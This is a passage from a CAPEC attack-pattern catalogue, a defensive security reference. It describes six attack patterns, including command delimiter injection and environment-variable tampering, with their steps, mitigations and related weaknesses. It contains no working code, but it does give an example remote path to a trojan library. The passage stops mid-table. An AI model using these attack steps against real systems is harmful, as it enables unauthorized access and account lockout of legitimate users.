CAPEC Standard Abstraction Attack Pattern Slice Release 1.4
CAPEC Standard Abstraction Attack Pattern Slice Release 1.4
This view (slice) covers standard abstraction attack patterns.
| Attack Pattern ID | Pattern Abstraction: Standard 1 | | Typical Severity | High | | Description | Summary In applications, particularly web applications, access to functionality is mitigated by the authorization framework, whose job it is to map ACLs to elements of the application's functionality; particularly URL's for web apps. In the case that the application deployer failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application or can run queries for data that he is otherwise not supposed to. Attack Execution Flow Explore Survey: The attacker surveys the target application, possibly as a valid and authenticated user | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Spidering web sites for all available links | env-Web | | Brute force guessing of resource names | env-All | | Brute force guessing of user names / credentials | env-All | | Brute force guessing of function names / actions | env-All |
| Indicators of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c1s1i1 | Positive | ACLs or other access control mechanisms are present in the software | env-Web env-ClientServer | | c1s1i2 | Positive | User IDs or other credentials are present in the software | env-Web env-ClientServer | | c1s1i3 | Positive | Operating modes with different privileges are present in the software | env-ClientServer env-Local env-Embedded |
Identify Functionality: At each step, the attacker notes the resource or functionality access mechanism invoked upon performing specific actions | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Use the web inventory of all forms and inputs and apply attack data to those inputs. | env-Web | | Use a packet sniffer to capture and record network traffic | env-CommProtocol | | Execute the software in a debugger and record API calls into the operating system or important libraries. This might occur in an environment other than a production environment, in order to find weaknesses that can be exploited in a production environment. | env-Local env-Embedded |
| Outcome |
|---|
| ID | Type | Description |
|---|
| c1s2o1 | Success | The attacker produces a list of functionality or data that can be accessed through the system. |
Experiment Iterate over access capabilities: Possibly as a valid user, the attacker then tries to access each of the noted access mechanisms directly in order to perform functions not constrained by the ACLs. | Attack Step
Technique |
|---|
| Description | Environments |
|---|
| Fuzzing of API parameters (URL parameters, OS API parameters, protocol parameters) | env-Web env-Local env-Embedded env-ClientServer |
| Indicator of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c1s3i1 | Negative | Attempts to create a catalog of access mechanisms and data have failed. | env-All |
| Outcome |
|---|
| ID | Type | Description |
|---|
| c1s3o1 | Success | Functionality is accessible to unauthorized users. |
| | Attack Prerequisites | The application must be navigable in a manner that associates elements (subsections) of the application with ACLs. The various resources, or individual URLs, must be somehow discoverable by the attacker The deployer must have forgotten to associate an ACL or has associated an inappropriately permissive ACL with a particular navigable resource. | | Typical Likelihood of Exploit |
Very High
| | Methods of Attack | | | Examples-Instances | Description Implementing the Model-View-Controller (MVC) within Java EE's Servlet paradigm using a "Single front controller" pattern that demands that brokered HTTP requests be authenticated before hand-offs to other Action Servlets.
If no security-constraint is placed on those Action Servlets, such that positively no one can access them, the front controller can be subverted. | | Attacker Skill or Knowledge Required | Low: In order to discover unrestricted resources, the attacker does not need special tools or skills. He only has to observe the resources or access mechanisms invoked as each action is performed and then try and access those access mechanisms directly. | | Resources Required | No special resources are required for the exploit of this pattern. | | Probing Techniques | In the case of web applications, use of a spider or other crawling software can allow an attacker to search for accessible pages not beholden to a security constraint. More generally, noting the target resource accessed upon performing specific actions drives an understanding of the resources accessible from the current context. | | Solutions and Mitigations | In a J2EE setting, deployers can associate a role that is impossible for the authenticator to grant users, such as "NoAccess", with all Servlets to which access is guarded by a limited number of servlets visible to, and accessible by, the user.
Having done so, any direct access to those protected Servlets will be prohibited by the web container.
In a more general setting, the deployer must mark every resource besides the ones supposed to be exposed to the user as accessible by a role impossible for the user to assume. The default security setting must be to deny access and then grant access only to those resources intended by business logic. | | Attack Motivation-Consequences | | | Context Description | The context of this pattern's applicability is most likely a web-based application, subject to an authorization framework. | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 285 | Improper Access Control (Authorization) | Targeted | | 276 | Insecure Default Permissions | Targeted | | 693 | Protection Mechanism Failure | Targeted | | 721 | OWASP Top Ten 2007 Category A10 - Failure to Restrict URL Access | Targeted |
| | Relevant Security Requirements | All resources must be constrained to be inaccessible by default followed by selectively allowing access to resources as dictated by application and business logic In addition to a central controller, every resource must also restrict, wherever possible, incoming accesses as dictated by the relevant ACL. | | Related Security Principles | - Failing Securely
- Least Privilege
- Reluctance To Trust
- Complete Mediation
| | Related Guidelines | - Use Authorization Mechanisms Correctly
- Design Configuration Subsystems Correctly and Distribute Safe Default Configurations
| | Purpose | Penetration | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| High | Medium | Low |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| John Steven | Cigital, Inc | 2007-02-10 | Initial core pattern content |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Chiradeep B. Chhaya | Cigital, Inc | 2007-02-23 | Fleshed out pattern with extra content | | Richard Struse | VOXEM, Inc | 2007-03-26 | Review and feedback leading to changes in Attack Execution Flow, Attack Prerequisites, Examples and Solutions | | Sean Barnum | Cigital, Inc | 2007-04-13 | Modified pattern content according to review and feedback | | Paco Hope | Cigital, Inc. | 2007-10-20 | Added extended Attack Execution Flow |
|
| Attack Pattern ID | Pattern Abstraction: Standard 2 | | Typical Severity | Medium | | Description | Summary An attacker leverages the security functionality of the system aimed at thwarting potential attacks to launch a denial of service attack against a legitimate system user. Many systems, for instance, implement a password throttling mechanism that locks an account after a certain number of incorrect log in attempts. An attacker can leverage this throttling mechanism to lock a legitimate user out of their own account. The weakness that is being leveraged by an attacker is the very security feature that has been put in place to counteract attacks. Attack Execution Flow Experiment Investigate account lockout behavior of system: Investigate the security features present in the system that may trigger an account lockout | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Analyze system documentation to find list of events that could potentially cause account lockout | env-Web env-ClientServer env-Local env-Embedded | | Obtain user account in system and attempt to lock it out by sending malformed or incorrect data repeatedly | env-Web env-ClientServer env-Local env-Embedded | | Determine another user's login ID, and attempt to brute force the password (or other credentials) for it a predetermined number of times, or until the system provides an indication that the account is locked out. | env-Web env-ClientServer env-Local env-Embedded |
| Indicators of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c2s1i1 | Positive | System provides error message stating that account being attacked is locked out. | env-Web env-ClientServer env-Local env-Embedded | | c2s1i2 | Positive | After a certain number of login attempts with a given user ID, the amount of time it takes for system to respond to further login attempts changes noticably. | env-Web env-ClientServer env-Local env-Embedded | | c2s1i3 | Negative | System has no automatic signup mechanism, and system provides no indication as to whether the attacker is entering incorrect credentials or the account is locked out during the login process. | env-Web env-ClientServer env-Local env-Embedded |
| Outcomes |
|---|
| ID | Type | Description |
|---|
| c2s1o1 | Success | Attacker determines at least one way to lock out accounts. | | c2s1o2 | Failure | System provides no indication that account lockouts are possible |
| Security
Controls |
|---|
| ID | Type | Description |
|---|
| c2s1sc1 | Detective | Repeated failed login attempts in application/system logs. | | c2s1sc2 | Preventative | Do not provide any indication to users that their accounts are locked out. Provide a simple error message such as: "Login failed. Try again or contact your administrator" regardless of why a login attempt fails. |
Obtain list of user accounts to lock out: Generate a list of valid user accounts to lock out | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Obtain list of authorized users using another attack pattern, such as SQL Injection. | env-Web env-ClientServer env-Local env-Embedded | | Attempt to create accounts if possible; system should indicate if a user ID is already taken. | env-Web env-ClientServer env-Local env-Embedded | | Attempt to brute force user IDs if system reveals whether a given user ID is valid or not upon failed login attempts. | env-Web env-ClientServer env-Local env-Embedded |
| Indicator of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c2s2i1 | Positive | System indicates which user IDs are valid and which are not to unauthenticated users. | env-Web env-ClientServer env-Local env-Embedded |
| Outcomes |
|---|
| ID | Type | Description |
|---|
| c2s2o1 | Success | Attacker gathers list of user IDs | | c2s2o2 | Inconclusive | Attacker is unable to gather list of valid user IDs; attacker may still be able to lock out accounts by blindly guessing user IDs and performing a lockout procedure with each one. |
| Security
Control |
|---|
| ID | Type | Description |
|---|
| c2s2sc1 | Preventative | Avoid providing any indication regarding the validity of user IDs upon failed login attempts. Provide a simple error message such as: "Login failed. Try again or contact your administrator" regardless of why a login attempt fails. |
Exploit Lock Out Accounts: Perform lockout procedure for all accounts that the attacker wants to lock out. | Attack Step
Technique |
|---|
| Description | Environments |
|---|
| For each user ID to be locked out, perform the lockout procedure discovered in the first step. | env-Web env-ClientServer env-Local env-Embedded |
| Indicators of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c2s3i1 | Positive | Success outcome in first step | env-Web env-ClientServer env-Local env-Embedded | | c2s3i2 | Negative | Failure outcome in first step | env-Web env-ClientServer env-Local env-Embedded |
| Outcomes |
|---|
| ID | Type | Description |
|---|
| c2s3o1 | Success | Amount of work required by an attacker to lock out a large number of accounts is at least an order of magnitude smaller than the amount of work required to unlock the accounts thereafter. | | c2s3o2 | Failure | The large amount of work required by an attacker to lock out a large number of accounts makes this an unattractive attack. |
| | Attack Prerequisites | The system has a lockout mechanism. An attacker must be able to reproduce behavior that would result in an account being locked. | | Typical Likelihood of Exploit |
High
| | Methods of Attack | - API Abuse
- Flooding
- Brute Force
| | Examples-Instances | Description A famous example of this type an attack is the eBay attack. eBay always displays the user id of the highest bidder. In the final minutes of the auction, one of the bidders could try to log in as the highest bidder three times. After three incorrect log in attempts, eBay password throttling would kick in and lock out the highest bidder's account for some time. An attacker could then make their own bid and their victim would not have a chance to place the counter bid because they would be locked out. Thus an attacker could win the auction. | | Attacker Skill or Knowledge Required | Low | | Resources Required | Computer with access to the login portion of the target system | | Solutions and Mitigations | Implement intelligent password throttling mechanisms such as those which take IP address into account, in addition to the login name. When implementing security features, consider how they can be misused and made to turn on themselves. | | Attack Motivation-Consequences | | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 400 | Uncontrolled Resource Consumption (aka 'Resource Exhaustion') | Secondary |
| | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| Eugene Lebanidze | Cigital, Inc | 2007-02-26 | |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Sean Barnum | Cigital, Inc | 2007-03-01 | Review and revision of content | | Richard Struse | VOXEM, Inc | 2007-03-26 | Review and feedback leading to changes in Name, Description and Solutions | | Sean Barnum | Cigital, Inc | 2007-04-13 | Modified pattern content according to review and feedback | | Amit Sethi | Cigital, Inc. | 2007-10-29 | Added extended Attack Execution Flow |
|
| Attack Pattern ID | Pattern Abstraction: Standard 96 | | Typical Severity | Medium | | Description | Summary An application typically makes calls to functions that are a part of libraries external to the application. These libraries may be part of the operating system or they may be third party libraries. It is possible that the application does not handle situations properly where access to these libraries has been blocked. Depending on the error handling within the application, blocked access to libraries may leave the system in an insecure state that could be leveraged by an attacker. Attack Execution Flow Determine what external libraries the application accesses. Block access to the external libraries accessed by the application. Monitor the behavior of the system to see if it goes into an insecure/inconsistent state. If the system does go into an insecure/inconsistent state, leverage that to obtain information about the system functionality or data, elevate access control, etc. The rest of this attack will depend on the context and the desired goal.
| | Attack Prerequisites | An application requires access to external libraries. An attacker has the priviliges to block application access to external libraries. | | Typical Likelihood of Exploit |
Medium
| | Methods of Attack | - API Abuse
- Modification of Resources
| | Examples-Instances | Description A web-based system uses a third party cryptographic random number generation library that derives entropy from machine's hardware. This library is used in generation of user session ids used by the applicatoin. If the library is inaccessible, the application instead uses a software based weak pseudo random number generation library. An attacker of the system blocks access of the application to the third party cryptographic random number generation library (by renaming it). The application in turn uses the weak pseudo random number generation library to generate session ids that are predictable. An attacker then leverages this weakness to guess a session id of another user to perform a horizontal elevation of privilege escalation and gain access to another user's account. | | Attacker Skill or Knowledge Required | Low | | Solutions and Mitigations | Ensure that application handles situations where access to APIs in external libraries is not available securely. If the application cannot continue its execution safely it should fail in a consistent and secure fashion. | | Attack Motivation-Consequences | - Denial of Service
- Information Leakage
- Privilege Escalation
| | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 589 | Call to Non-ubiquitous API | Targeted | | 227 | Failure to Fulfill API Contract (aka 'API Abuse') | Targeted |
| | Related Security Principles | | | Purpose | Exploitation | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| Low | Low | High |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| Sean Barnum | Cigital, Inc. | 2007-03-25 | Identified priority for pattern creation |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Evgeny Lebanidze | Cigital, Inc., | 2007-03-21 | Fleshed out content for pattern | | Sean Barnum | Cigital, Inc | 2007-04-16 | Review and revise |
|
| Attack Pattern ID | Pattern Abstraction: Standard 12 | | Typical Severity | High | | Description | Summary Attackers aware that more data is being fed into a multicast or public information distribution means can 'select' information bound only for another client, even if the distribution means itself forces users to authenticate in order to connect initally.
Doing so allows the attacker to gain access to possibly privileged information, possibly perpetrate other attacks through the distribution means by impersonation.
If the channel/message being manipulated is an input rather than output mechanism for the system, (such as a command bus), this style of attack could change its identifier from a less privileged to more so privileged channel or command. Attack Execution Flow Determine the nature of messages being transported as well as the identifiers to be used as part of the attack If required, authenticate to the distribution channel If any particular client's information is available through the transport means simply by selecting a particular identifier, an attacker can simply provide that particular identifier. Attackers with client access connecting to output channels could change their channel identifier and see someone else's (perhaps more privileged) data.
| | Attack Prerequisites | Information and client-sensitive (and client-specific) data must be present through a distribution channel available to all users. Distribution means must code (through channel, message identifiers, or convention) message destination in a manner visible within the distribution means itself (such as a control channel) or in the messages themselves. | | Typical Likelihood of Exploit |
Very High
| | Examples-Instances | Description A certain B2B interface on a large application codes for messages passed over a MQSeries queue, on a single "Partners" channel. Messages on that channel code for their client destination based on a partner_ID field, held by each message. That field is a simple integer. Attackers having access to that channel, perhaps a particularly nosey partner, can simply choose to store messages of another parnter's ID and read them as they desire. Note that authentication does not prevent a partner from leveraging this attack on other partners. It simply disallows Attackers without partner status from conducting this attack. | | Attacker Skill or Knowledge Required | Low: All the attacker needs to discover is the format of the messages on the channel/distribution means and the particular identifier used within the messages. | | Resources Required | The Attacker needs the ability to control source code or application configuration responsible for selecting which message/channel id is absorbed from the public distribution means. | | Probing Techniques | Assisted protocol analysis: because the protocol under attack is a public channel, or one in which the attacker likely has authorized access to, they need simply to decode the aspect of channel or message interpretation that codes for message identifiers.
Probing is as simple as changing this value and watching its effect. | | Solutions and Mitigations | Associate some ACL (in the form of a token) with an authenticated user which they provide middleware. The middleware uses this token as part of its channel/message selection for that client, or part of a discerning authorization decision for privileged channels/messages.
The purpose is to architect the system in a way that associates proper authentication/authorization with each channel/message. Rearchitect system input/output channels as appropriate to distribute self-protecting data. That is, encrypt (or otherwise protect) channels/messages so that only authorized readers can see them. | | Attack Motivation-Consequences | - Information Leakage
- Privilege Escalation
| | Context Description | This pattern applies in circumstances in which publically accessible distribution means code (through channel, message identifiers, or convention) for client-specific subscription information about messages being distributed. Commonly, this will happen over message-oriented middleware buses, multicast channels, or feeds. | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 201 | Information Leak Through Sent Data | Targeted | | 306 | No Authentication for Critical Function | Secondary |
| | Related Attack Patterns | | ID | Name | Relationship Type | Relationship Description |
|---|
| 21 | Exploitation of Session Variables, Resource IDs and other Trusted Credentials | Similar | |
| | Related Security Principles | | | Related Guidelines | - Use Authentication Mechanisms, Where Appropriate, Correctly
- Use Authorization Mechanisms Correctly: this refers to Ambiguity of authentication. Many authorization systems use ambiguous symbols (i.e., principal names) to identify principals allowing circumvention of authorization by using a different, though equivalent, principal name. For example, there are many implementations for restricting remote host access to local services that may allow many proper—but apparently different—names for unique hosts (e.g., fully qualified domain names, shortened names, CNAMEs, IPv4 addresses, IPv6 addresses).
| | Purpose | Penetration | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| Medium | Low | Low |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| Client-Server | All | All | All |
| | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| John Steven | Cigital, Inc | 2007-02-10 | Initial core pattern content |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Chiradeep B. Chhaya | Cigital, Inc | 2007-02-23 | Fleshed out pattern with extra content | | Richard Struse | VOXEM, Inc | 2007-03-26 | Review and feedback leading to changes in Description and Related Attack Patterns | | Sean Barnum | Cigital, Inc | 2007-04-13 | Modified pattern content according to review and feedback |
|
| Attack Pattern ID | Pattern Abstraction: Standard 13 | | Typical Severity | Very High | | Description | Summary The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker's goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker. Attack Execution Flow The attacker probes the application for information. Which version of the application is running? Are there known environment variables? etc. The attacker gains control of an environment variable and ties to find out what process(es) the environment variable controls. The attacker modifies the environment variable to abuse the normal flow of processes or to gain access to privileged ressources.
| | Attack Prerequisites | An environment variable is accessible to the user. An environment variable used by the application can be tainted with user supplied data. Input data used in an environment variable is not validated properly. The variables encapsulation is not done properly. For instance setting a variable as public in a class makes it visible and an attacker may attemp to manipulate that variable. | | Typical Likelihood of Exploit |
Very High
| | Methods of Attack | - Injection
- Modification of Resources
- Protocol Manipulation
| | Examples-Instances | Description Environment variables
Changing the LD_LIBRARY_PATH environment variable in TELNET will cause TELNET to use an alternate (possibly Trojan) version of a function library. The Trojan library must be accessible using the target file system and should include Trojan code that will allow the user to log in with a bad password. This requires that the attacker upload the Trojan library to a specific location on the target.
As an alternative to uploading a Trojan file, some file systems support file paths that include remote addresses, such as \\172.16.2.100\shared_files\trojan_dll.dll. Related Vulnerability Path Manipulation (CVE-1999-0073) | | Attacker Skill or Knowledge Required | Low: In a web based scenario, the client controls the data that it submitted to the server. So anybody can try to send malicious data and try to bypass the authentication mechanism.
Medium/High: Some more advanced attacks may require knowledge about protocols and probing technique which help controling a variable. The malicious user may try to understand the authentication mechanism in order to defeat it. | | Probing Techniques | An attacker can intentionally modify the client side parameter and monitor how the server behaves in response to that modification. For instance an attacker will look at the cookie data, the URL parameters, the hidden variables in forms, variables used in system calls, etc. If the client uses a program in binary format to connect to the server, disassembler can be used to identify parameter within the binary code, and then the attacker would try to simulate the client application and change some of the parameters sent to the server. For instance the attacker may find that a secret key or a path is hard coded in the binary client application. Environment variables are frequently stored in cleartext configuration files. If the attacker can modify those configuration files, he can control the environment variables. Even a read access can potentially be dangerous since this may give sensitive information to perform this type of attack. Indeed knowing which environment variables the application uses is a prerequisite to this type of attack. | | Obfuscation Techniques | The attacker may try to obfuscate its attempts to subvert the target process (such as authentication) by using valid values for the variable she controls. By using valid values the user tries to understand the authentication mechanism. This would be in preparation to a more serious attack. | | Solutions and Mitigations | Protect environment variables against unauthorized read and write access. Protect the configuration files which contain environment variables against illegitimate read and write access. Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system. Apply the least privilege principles. If a process has no legitimate reason to read an environment variable do not give that privilege. | | Attack Motivation-Consequences | - Run Arbitrary Code
- Privilege Escalation
- Denial of Service
- Information Leakage
| | Injection Vector | The client controlled parameter | | Payload | The new value of the client controlled parameter. | | Activation Zone | The activation zone is the server side function where the client controlled parameter is consumed. | | Payload Activation Impact | Consuming an attacker contolled parameter can defeat the normal process of the application. | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 353 | Failure to Add Integrity Check Value | Targeted | | 285 | Improper Access Control (Authorization) | Secondary | | 302 | Authentication Bypass by Assumed-Immutable Data | Targeted | | 74 | Failure to Sanitize Data into a Different Plane (aka 'Injection') | Targeted | | 15 | External Control of System or Configuration Setting | Targeted | | 73 | External Control of File Name or Path | Targeted | | 20 | Improper Input Validation | Secondary | | 200 | Information Leak (Information Disclosure) | Secondary |
| | Related Vulnerabilities | | Vulnerability-ID | Vulnerability Description |
|---|
| CVE-2006-4244 | SQL-Ledger 2.4.4 through 2.6.17 authenticates users by verifying that the value of the sql-ledger-[username] cookie matches the value of the sessionid parameter, which allows remote attackers to gain access as any logged-in user by setting the cookie and the parameter to the same value. | | CVE-2006-2734 | enter.asp in Mini-Nuke 2.3 and earlier makes it easier for remote attackers to conduct password guessing attacks by setting the guvenlik parameter to the same value as the hidden gguvenlik parameter, which bypasses a verification step because the guvenlik parameter is assumed to be immutable by the attacker. | | CVE-2006-2527 | Admin/admin.php in phpBazar 2.1.0 and earlier allows remote attackers to bypass the authentication process and gain unauthorized access to the administrative section by setting the action parameter to edit_member and the value parameter to 1. | | CVE-2006-1505 | base_maintenance.php in Basic Analysis and Security Engine (BASE) before 1.2.4 (melissa), when running in standalone mode, allows remote attackers to bypass authentication, possibly by setting the standalone parameter to "yes". |
| | Related Attack Patterns | | ID | Name | Relationship Type | Relationship Description |
|---|
| 77 | Manipulating User-Controlled Variables | More Detailed | | | 76 | Manipulating Input to File System Calls | More Abstract | | | 14 | Client-side Injection-induced Buffer Overflow | Occasionally Precedes | | | 10 | Buffer Overflow via Environment Variables | Similar | |
| | Related Security Principles | | | Related Guidelines | - Always perform wise data validation. Do not accept tainted data without validation. Do not simply base authentication on the client controlled parameter.
- Avoid relying on client side validation only.
| | Purpose | Penetration | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| Medium | High | Low |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | References | G. Hoglund and G. McGraw. Exploiting Software: How to Break Code. Addison-Wesley, February 2004. CWE - Input Validation | | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| G. Hoglund and G. McGraw. Exploiting Software: How to Break Code. Addison-Wesley, February 2004. | Cigital, Inc | 2007-03-01 | |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Eric Dalci | Cigital, Inc | 2007-02-13 | Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" | | Sean Barnum | Cigital, Inc | 2007-03-05 | Review and revise | | Richard Struse | VOXEM, Inc | 2007-03-26 | Review and feedback leading to changes in Name, Description and Related Attack Patterns | | Sean Barnum | Cigital, Inc | 2007-04-13 | Modified pattern content according to review and feedback |
|
| Attack Pattern ID | Pattern Abstraction: Standard 15 | | Typical Severity | High | | Description | Summary An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or a blacklist input validation, as opposed to whitelist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or blacklist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on. Attack Execution Flow Explore Assess Target Runtime Environment: In situations where the runtime environment is not implicitly known, the attacker makes connections to the target system and tries to determine the system's runtime environment. Knowing the environment is vital to choosing the correct delimiters. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Port mapping using network connection-based software (e.g., nmap, nessus, etc.) | env-ClientServer env-Embedded env-CommProtocol env-Peer2Peer env-Web | | Port mapping by exploring the operating system (netstat, sockstat, etc.) | env-Local | | TCP/IP Fingerprinting | env-All | | Induce errors to find informative error messages | env-All |
| Indicator of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c15s1i1 | Positive | The target software accepts connections via the network. | env-Web env-CommProtocol env-Peer2Peer env-Embedded |
| Outcomes |
|---|
| ID | Type | Description |
|---|
| c15s1o1 | Success | Operating environment (operating system, language, and/or middleware) is correctly identified. | | c15s1o2 | Inconclusive | Multiple candidate operating environments are suggested. |
| Security
Controls |
|---|
| ID | Type | Description |
|---|
| c15s1s1 | Preventative | Provide misleading information on TCIP/IP fingerprints (some operating systems can be configured to send signatures that match other operating systems). | | c15s1s2 | Preventative | Provide misleading information at the server level (e.g., Apache, IIS, WebLogic, etc.) to announce a different server software. | | c15s1s3 | Detective | Some fingerprinting techniques can be detected by operating systems or by network IDS systems because they leave the network connection half-open, or they do not belong to a valid, open connection. |
Survey the Application: The attacker surveys the target application, possibly as a valid and authenticated user | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Spidering web sites for all available links | env-Web | | Inventory all application inputs | env-All |
| Indicator of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c15s2i1 | Positive | Attacker develops a list of valid inputs | env-Web env-ClientServer |
| Outcome |
|---|
| ID | Type | Description |
|---|
| c15s2o1 | Success | The attacker develops a list of likely command delimiters. |
| Security
Controls |
|---|
| ID | Type | Description |
|---|
| c151s2s1 | Detective | Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). | | c151s2s2 | Detective | Create links on some pages that are visually hidden from web browsers. Using IFRAMES, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application. | | c151s2s3 | Preventative | Actively monitor the application and either deny or redirect requests from origins that appear to be automated. | | c151s2s4 | Detective | Monitor velocity of feature activations (non-web software). Humans who activate features (click buttons, request actions, invoke APIs, etc.) will do so far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). |
Experiment Attempt delimiters in inputs: The attacker systematically attempts variations of delimiters on known inputs, observing the application's response each time. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Inject command delimiters using network packet injection tools (netcat, nemesis, etc.) | env-CommProtocol env-Web env-Peer2Peer env-ClientServer | | Inject command delimiters using web test frameworks (proxies, TamperData, custom programs, etc.) | env-Web | | Enter command delimiters directly in input fields. | env-Embedded env-Local env-ClientServer |
| Indicator of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c15s3i1 | Positive | Attack step 2 is successful. | env-All |
| Outcome |
|---|
| ID | Type | Description |
|---|
| c15s3o1 | Success | One or more command delimiters for the platform provokes an unexpected response from the software, which can be varied by the attacker based on the input. |
Exploit Use malicious command delimiters: The attacker uses combinations of payload and carefully placed command delimiters to attack the software. | Outcome |
|---|
| ID | Type | Description |
|---|
| c15s4o1 | Success | The software performs as expected by the attacker. |
| Security
Control |
|---|
| ID | Type | Description |
|---|
| c15s4s1 | Detective | |
| | Attack Prerequisites | Software's input validation or filtering must not detect and block presence of additional malicious command. | | Typical Likelihood of Exploit |
High
| | Methods of Attack | | | Examples-Instances | Description By appending special characters, such as a semicolon or other commands that are executed by the target process, the attacker is able to execute a wide variety of malicious commands in the target process space, utilizing the target's inherited permissions, against any resource the host has access to. The possibilities are vast including injection attacks against RDBMS (SQL Injection), directory servers (LDAP Injection), XML documents (XPath and XQuery Injection), and command line shells. In many injection attacks, the results are converted back to strings and displayed to the client process such as a web browser without tripping any security alarms, so the network firewall does not log any out of the ordinary behavior.
LDAP servers house critical identity assets such as user, profile, password, and group information that is used to authenticate and authorize users. An attacker that can query the directory at will and execute custom commands against the directory server is literally working with the keys to the kingdom in many enterprises. When user, organizational units, and other directory objects are queried by building the query string directly from user input with no validation, or other conversion, then the attacker has the ability to use any LDAP commands to query, filter, list, and crawl against the LDAP server directly in the same manner as SQL injection gives the ability to the attacker to run SQL commands on the database. | | Attacker Skill or Knowledge Required | Medium: The attacker has to identify injection vector, identify the specific commands, and optionally collect the output, i.e. from an interactive session. | | Resources Required | Ability to communicate synchronously or asynchronously with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP. | | Solutions and Mitigations | Design: Perform whitelist validation against a positive specification for command length, type, and parameters. Design: Limit program privileges, so if commands circumvent program input validation or filter routines then commands do not running under a privileged account Implementation: Perform input validation for all remote content. Implementation: Use type conversions such as JDBC prepared statements. | | Attack Motivation-Consequences | - Run Arbitrary Code
- Information Leakage
| | Context Description | "Attack Pattern: Command Delimiters
"Using the semicolon or other off-nominal characters, multiple commands can be strung together. Unsuspecting target programs will execute all the commands."
[Hoglund and McGraw 04] | | Injection Vector | Malicious input delivered through appending delimiters to standard input | | Payload | Command(s) appended to valid parameters to enable attacker to execute commands on host | | Activation Zone | Client machine and client network | | Payload Activation Impact | Enables attacker to execute server side code with any commands that the program owner has privileges to. | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 146 | Failure to Sanitize Expression/Command Delimiters | Targeted | | 77 | Failure to Sanitize Data into a Control Plane (aka 'Command Injection') | Targeted | | 184 | Incomplete Blacklist | Targeted | | 78 | Failure to Preserve OS Command Structure (aka 'OS Command Injection') | Targeted | | 185 | Incorrect Regular Expression | Targeted | | 93 | Failure to Sanitize CRLF Sequences (aka 'CRLF Injection') | Targeted | | 140 | Failure to Sanitize Delimiters | Targeted | | 157 | Failure to Sanitize Paired Delimiters | Targeted | | 138 | Failure to Sanitize Special Elements | Targeted | | 154 | Failure to Sanitize Variable Name Delimiter | Targeted | | 697 | Insufficient Comparison | Targeted | | 713 | OWASP Top Ten 2007 Category A2 - Injection Flaws | Targeted |
| | Related Attack Patterns | | ID | Name | Relationship Type | Relationship Description |
|---|
| 6 | Argument Injection | More Detailed | |
| | Purpose | Penetration | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| High | High | High |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | References | G. Hoglund and G. McGraw. Exploiting Software: How to Break Code. Addison-Wesley, February 2004. | | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
